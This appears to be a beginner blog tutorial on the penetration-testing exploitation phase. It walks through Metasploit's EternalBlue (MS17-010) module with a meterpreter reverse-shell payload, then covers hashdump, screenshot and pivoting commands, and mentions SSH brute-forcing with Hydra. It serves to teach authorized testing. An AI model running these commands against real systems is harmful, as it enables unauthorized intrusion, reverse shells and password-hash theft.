In the world of cybersecurity, penetration testing is a critical practice to identify vulnerabilities and strengthen an organization's defense. One of the most crucial and exciting stages of a penetration test is the Exploitation Phase.
The Exploitation Phase is where a penetration tester (pentester) takes the vulnerabilities discovered during earlier phases, such as scanning and enumeration, and attempts to exploit them. The goal is to gain unauthorized access, escalate privileges, or take control of systems, essentially demonstrating what a real attacker could achieve.
Exploitation can range from gaining a foothold on a network to full system compromise, depending on the vulnerabilities discovered. However, unlike malicious hackers, penetration testers must carefully document the process to ensure systems aren't irreparably damaged.
One of the most popular tools for exploitation is Metasploit. It's a powerful open-source framework that helps pentesters automate the process of finding, exploiting, and testing vulnerabilities.
Let’s walk through an example of using Metasploit to exploit a vulnerable system. We’ll assume we’ve already completed scanning and identified a machine running an outdated version of Microsoft SMB (MS17-010), vulnerable to the famous EternalBlue exploit.
Step 1: Fire Up Metasploit
Start by launching Metasploit. Open your terminal and type:
msfconsole
Metasploit will load, displaying its signature ASCII logo.
Step 2: Search for the Exploit
Since we know the system is vulnerable to EternalBlue (MS17-010), we can search for the relevant exploit module. Use the following command to search:
search ms17_010
Metasploit will return a list of potential exploits. In this case, we are looking for exploit/windows/smb/ms17_010_eternalblue.
Step 3: Select the Exploit
Now, we’ll select the exploit by using:
use exploit/windows/smb/ms17_010_eternalblue
Step 4: Set Your Parameters
Before launching the exploit, you need to configure some options, such as the target IP address. Use the following commands to set the target:
set RHOSTS <target IP>
You may also need to specify the payload. Metasploit will automatically suggest one, but let’s explicitly set it to a reverse shell:
set payload windows/x64/meterpreter/reverse_tcp
Next, set your local IP (the attacker's IP):
set LHOST <your IP>
Step 5: Run the Exploit
Now that everything is set up, we can run the exploit:
exploit
If successful, you’ll see output indicating that the exploit has worked and a Meterpreter session has been opened.
If not successfull, you'll see an error simalar to mine(my machine isn't vulnerable to Eternalblue(I patched it)).
---
Step 6: Post-Exploitation
Once you’ve gained access, the next step is Post-Exploitation. In this phase, you may perform actions like:
Extracting Password Hashes:
hashdump
Capturing Screenshots:
screenshot
Pivoting to Other Machines: Using tools like portfwd to route traffic.
Be Cautious: Ensure you understand the target system and avoid actions that might crash it.
Document Everything: Keep detailed notes of each step and command used, as this information will be crucial for your report.
Follow Rules of Engagement (RoE): Always stick to the scope of the penetration test to avoid legal or ethical issues.
Something I wish I would have known about the exploitation phase, is there are different ways to exploit a vulnerability, for example, using python or ruby and writing direct TCP requests to a SSH Server to test out different passwords(or use a tool like Hydra). The Kali Linux organization has a large list and guide on using different tools so I won't recreate those but know that it's an option. Also another good resource for finding Exploit code is the Exploit-DB. There is also a CLI tool called searchsploit.
The Exploitation Phase is where pentesters demonstrate the real-world impact of vulnerabilities. Using tools like Metasploit, pentesters can simulate attacks in a controlled environment, helping organizations understand and mitigate their security risks.
In our example, we exploited a vulnerable version of Microsoft SMB using the EternalBlue vulnerability. With Metasploit, we gained unauthorized access and launched a reverse shell, simulating the kind of breach a malicious actor could carry out. This is By no means an EXTENSIVE guide, just a quick look at what a typical exploit may look like.
Remember, the goal of a penetration test is not to cause harm but to reveal weaknesses and help organizations better protect their systems.
If you have any questions about this process or want to dive deeper into specific post-exploitation techniques, feel free to reach out!